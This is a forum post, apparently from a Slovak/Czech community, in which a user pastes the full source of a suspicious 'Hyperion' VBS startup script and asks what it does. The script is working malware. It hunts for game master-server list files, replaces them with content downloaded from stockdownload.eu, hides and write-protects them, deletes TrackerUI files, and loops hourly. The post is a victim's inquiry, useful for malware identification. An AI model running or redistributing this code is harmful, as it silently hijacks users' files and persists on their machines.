Zdravím, dnes som na PC natrafil na divný vbs skript s názvom Hyperion v
startup aplikáciách. Zabil som ho v správcovi úloh a pátral som, čo je to
zač.
Na internete o ňom ale nič nie je.
Keďže som bol zvedavý, našiel som ho v PC a otvoril (kód):
Sub unProtectFile( filename )
dim readfile, filesys
set filesys = CreateObject("Scripting.FileSystemObject")
If filesys.FileExists( filename ) Then
set readfile = filesys.GetFile( filename )
readfile.Attributes = 0' normal
End If
End Sub
Sub protectFile( filename )
dim readfile, filesys
set filesys = CreateObject("Scripting.FileSystemObject")
If filesys.FileExists( filename ) Then
set readfile = filesys.GetFile( filename )
readfile.Attributes = 7 ' hidden + system + readonly
End If
End Sub
Sub DeleteAFile( filename )
Dim filesys
Set filesys = CreateObject("Scripting.FileSystemObject")
If filesys.FileExists( filename ) Then
unProtectFile( filename )
filesys.DeleteFile( filename )
End If
End Sub
Sub RenameFile( oldName, newName )
Dim filesys
Set filesys = WScript.CreateObject("Scripting.FileSystemObject")
If filesys.FileExists( oldName ) Then
filesys.MoveFile oldName, newName
End If
End Sub
Sub HyperionModifyOne
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colFiles = objWMIService.ExecQuery _
("Select * from CIM_DataFile Where FileName = 'MasterServers'")
For Each objFile in colFiles
On Error Resume Next
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
Call objHTTP.Open("GET", "http://stockdownload.eu/cmd/MasterServers.vdf?" & Rnd, FALSE)
objHTTP.Send
If Err.Number <> 0 Then
Else
DeleteAFile objFile.Drive & objFile.Path & objFile.FileName & "." & objFile.Extension
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.CreateTextFile(objFile.Drive & objFile.Path & objFile.FileName & "." & objFile.Extension, ForWriting)
objFile.Write objHTTP.ResponseText
objFile.Close
protectFile(objFile.Drive & objFile.Path & objFile.FileName & "." & objFile.Extension)
End If
On Error Goto 0
Next
Call HyperionModifyTwo
End Sub
Sub HyperionModifyTwo
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colFiles = objWMIService.ExecQuery _
("Select * from CIM_DataFile Where FileName = 'rev_MasterServers'")
For Each objFile in colFiles
On Error Resume Next
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
Call objHTTP.Open("GET", "http://stockdownload.eu/cmd/MasterServers.vdf?" & Rnd, FALSE)
objHTTP.Send
If Err.Number <> 0 Then
Else
DeleteAFile objFile.Drive & objFile.Path & objFile.FileName & "." & objFile.Extension
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.CreateTextFile(objFile.Drive & objFile.Path & objFile.FileName & "." & objFile.Extension, ForWriting)
objFile.Write objHTTP.ResponseText
objFile.Close
protectFile(objFile.Drive & objFile.Path & objFile.FileName & "." & objFile.Extension)
End If
On Error Goto 0
Next
Call HyperionModifyThree
End Sub
Sub HyperionModifyThree
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colFiles = objWMIService.ExecQuery _
("Select * from CIM_DataFile Where FileName = 'TrackerUI'")
For Each objFile in colFiles
On Error Resume Next
DeleteAFile objFile.Drive & objFile.Path & objFile.FileName & "." & objFile.Extension
On Error Goto 0
Next
WScript.Sleep(3600000)
Call HyperionModifyOne
End Sub
Call HyperionModifyOne
Děláme co je v našich silách, aby byly zdejší diskuze co nejkvalitnější. Proto do nich také mohou přispívat pouze registrovaní členové. Pro zapojení do diskuze se přihlas. Pokud ještě nemáš účet, zaregistruj se, je to zdarma.
